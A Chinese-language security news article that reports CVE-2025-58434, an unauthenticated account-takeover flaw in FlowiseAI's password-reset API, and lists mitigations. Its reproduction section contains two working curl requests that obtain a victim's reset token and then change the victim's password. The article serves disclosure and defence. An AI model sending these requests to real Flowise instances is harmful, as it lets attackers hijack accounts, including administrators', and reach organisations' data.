开源生成式AI开发平台FlowiseAI(广泛用于构建AI代理和LLM工作流)近日被发现存在高危漏洞,攻击者可在未认证状态下接管云环境和本地部署环境中的任意账户。
漏洞详情
该漏洞编号为CVE-2025-58434,CVSS评分为9.8分,源于平台的密码重置机制。安全公告指出:"Flowise的密码找回端点(/api/v1/account/forgot-password)在未经认证或验证的情况下,直接返回包含有效密码重置临时令牌(tempToken)在内的敏感信息。攻击者可借此为任意用户生成重置令牌并直接修改密码,最终实现完全账户接管(ATO)。"
技术分析
该漏洞端点仅需输入邮箱地址即可触发响应,但API并未通过邮件安全发送重置链接,而是直接返回以下敏感信息:
- 用户ID、姓名、邮箱及凭证哈希值
- 账户状态和时间戳
- 有效的密码重置临时令牌及其有效期
安全公告特别强调:"攻击者获取tempToken后,可立即在/api/v1/account/reset-password端点重复使用,无需邮件验证或用户交互即可重置目标账户密码。"由于仅需获知受害者邮箱(通常可猜测或公开获取),未认证攻击者即可接管包括管理员在内的任意账户。
攻击复现
公告提供了完整的攻击链复现步骤:
- 获取重置令牌
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"[email protected]"}}'
响应报文将包含有效tempToken
- 利用令牌重置密码
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{ "user":{ "email":"[email protected]", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }'
当返回200 OK
状态码时,受害者密码即被修改
风险影响
该漏洞被归类为"认证绕过/不安全的直接对象引用",具体影响包括:
- 完全账户接管(含高权限管理员账户)
- 数据泄露与身份冒用(可访问组织敏感资产)
- 无需用户交互(大幅降低攻击门槛)
- 同时影响云环境和本地部署(扩大威胁面)
公告警告称:"由于攻击无需前置条件或用户交互,该漏洞极有可能被大规模利用。"
缓解措施
目前FlowiseAI尚未发布补丁,3.0.5之前的所有版本均受影响。建议采取以下临时防护措施:
- 禁止API响应返回重置令牌等敏感信息
- 确保令牌仅通过安全邮件渠道传递
- 返回通用成功消息以避免用户枚举
- 实施单次有效、短生命期且绑定请求源的令牌
- 记录并监控所有密码重置请求
- 为敏感账户启用多因素认证(MFA)
在官方补丁发布前,管理员需严格实施临时解决方案,限制漏洞端点暴露,并密切监控重置操作。正如公告所述:"该漏洞实质上允许任何未认证攻击者通过请求目标邮箱的重置令牌,接管包括管理员在内的任意账户。"
参考来源:
PoC Available: FlowiseAI Flaw (CVE-2025-58434) Allows Full Account Takeover (CVSS 9.8)
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)